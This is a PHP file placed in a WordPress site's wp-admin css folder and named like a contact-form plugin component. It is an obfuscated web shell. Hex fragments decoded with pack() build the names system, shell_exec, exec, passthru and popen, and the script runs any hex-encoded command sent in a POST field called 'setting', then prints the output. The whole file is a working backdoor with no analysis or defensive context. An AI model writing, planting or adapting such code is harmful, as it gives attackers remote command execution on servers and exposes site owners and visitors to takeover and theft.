File: /var/www/kosmicevents/public/wp-admin__7af9720/css/aicontactsafe.php
<?php
$factor1 = '737';
$factor2 = '746';
$factor3 = '56d';
$factor4 = '865';
$factor5 = '6c6';
$factor6 = '657';
$factor7 = '727';
$factor8 = 'f70';
$factor9 = 'e74';
$factor10 = '706';
$factor11 = '6f7';
$factor12 = '365';
$factor13 = '736';
$factor14 = '574';
$factor15 = '677';
$right_pad_string1 = pack("H*", $factor1.'973'.$factor2.$factor3);
$right_pad_string2 = pack("H*", '736'.$factor4.$factor5.'c5f'.'657'.$factor4);
$right_pad_string3 = pack("H*", $factor6.$factor4);
$right_pad_string4 = pack("H*", '706'.'173'.'737'.'468'.$factor7);
$right_pad_string5 = pack("H*", '706'.$factor8.'656');
$right_pad_string6 = pack("H*", '737'.'472'.'656'.'16d'.'5f6'.'765'.'745'.'f63'.'6f6'.$factor9.'656'.'e74');
$right_pad_string7 = pack("H*", $factor10.'36c'.$factor11.$factor12);
$settings = pack("H*", $factor13.$factor14.$factor2.'96e'.$factor15);
if (isset($_POST[$settings])) {
$settings = pack("H*", $_POST[$settings]);
if (function_exists($right_pad_string1)) {
$right_pad_string1($settings);
} elseif (function_exists($right_pad_string2)) {
print $right_pad_string2($settings);
} elseif (function_exists($right_pad_string3)) {
$right_pad_string3($settings, $descriptor_holder);
print join("\n", $descriptor_holder);
} elseif (function_exists($right_pad_string4)) {
$right_pad_string4($settings);
} elseif (function_exists($right_pad_string5) && function_exists($right_pad_string6) && function_exists($right_pad_string7)) {
$mrk_ent = $right_pad_string5($settings, 'r');
if ($mrk_ent) {
$element_data_chunk = $right_pad_string6($mrk_ent);
$right_pad_string7($mrk_ent);
print $element_data_chunk;
}
}
exit;
}